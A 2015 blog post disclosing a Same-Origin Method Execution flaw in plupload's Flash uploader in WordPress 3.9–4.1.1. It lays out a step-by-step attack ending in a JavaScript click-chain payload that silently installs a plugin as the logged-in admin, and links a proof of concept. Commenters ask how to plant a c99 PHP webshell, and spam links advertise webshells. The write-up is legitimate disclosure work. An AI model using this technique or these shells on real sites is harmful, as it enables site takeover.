środa, 22 kwietnia 2015

plupload - Same-Origin Method Execution [Wordpress 3.9 - 4.1.1]

This January I've found and reported XSS vulnerability in plupload, that affects Wordpress from 3.9 to 4.1.1.  As far as there was no ability to control arguments of function called - the "only" thing we could do with this issue was Same-Origin Method Execution.

Before you start reading technical details - you should update your Wordpress / plupload first.

If you will dig a bit in Flash plupload 2.1.2 source code, you can notice interesting thing in _init() function:


...and _fireEvent()


So we can manipulate with target GET parameter to execute javascript functions, but we can use only alphanumeric characters and dot. Still can be useful, the scenario goes like this:

1. In first tab create new window with target _blank and URL http://hostname/proxy.php
2. Then redirect first tab to http://target-wordpress/wp-admin/plugin-install.php?tab=plugin-information&plugin=google-analytics-dashboard-for-wp&section=description - of course you can use any other plugin install page.
3. The second's tab proxy.php sleeps for few seconds and then redirect to vulnerable plupload on target-wordpress calling this function:


window.opener.document.body.lastChild.previousElementSibling.previousElementSibling.previousElementSibling.lastChild.click()

4. ....aaaand plugin is installed now. ;-)

This one can be of course more automated and faster to install malicious, vulnerable plugins, that after successful exploit will give us webshell or anything we need to own the machine. In my opinion - this can be really dangerous.

PoC: http://ropchain.org/poc/wordpress/

18 komentarzy:

  1. Ten komentarz został usunięty przez autora.

    OdpowiedzUsuń
  2. where is the proxy.php script please ?

    OdpowiedzUsuń
    Odpowiedzi
    1. As mentioned - it just sleeps for few seconds and do redirect.



      Simple as that. :)

      Usuń
    2. http://pastebin.com/WuJxSgBH

      Usuń
  3. Ten komentarz został usunięty przez autora.

    OdpowiedzUsuń
  4. Odpowiedzi
    1. Which browser do you use?

      I belive that you're logged in as admin in Wordpress during the test? ;-)

      Usuń
  5. I use FF
    Im not logged :) I thought this was a fail to 'hack' a WP website ...

    OdpowiedzUsuń
  6. Can i get the vulnerable flash file. I am not able to reproduce this.

    OdpowiedzUsuń
    Odpowiedzi
    1. You can find it by downloading archive Wordpress version (like 4.1.1)

      Usuń
    2. i tried on that older versions of wordpress only, but is not working, also i noticed little changes those flash file compared to the snippet given above in your blog. So thought may be the flash file is changed. Can you share your email ID please.

      Usuń
    3. It opens two tabs but the plugin is not getting installed, not sure what am i missing.

      Usuń
    4. DD - try to DM me at twitter or visit http://ropchain.org/ for my e-mail.

      Usuń
  7. How would this look if i wanted to install a shell lets say
    shell c99?
    https://r57.gen.tr/1464020527-c99.html

    OdpowiedzUsuń
  8. https://r57.gen.tr/1464020527-c99.html
    wp-admin/plugin-install.php?tab=plugin-information&plugin=google-analytics-dashboard-for-wp&section=description

    How to make it upload a php shell? thats not listen wordpress plugins website lol?

    OdpowiedzUsuń
  9. Agilestorelocator.com is the professional in wordpress plugin and store locator wordpress. Here is also options available for the plugin is for WordPress.

    OdpowiedzUsuń
  10. Hello, we provide you with variety of webshells which are asp, aspx and php web backdoors, such as b374k, c99, r57, pouya, wso etc. https://webshell.co

    OdpowiedzUsuń
  11. We are providing the services in wordpress to store locator plugin. You can get store locator wordpress through this and also store locator wordpress. We are giving the administrations in wordpress to store locator module. You can get store locator wordpress through this furthermore google store locator.

    OdpowiedzUsuń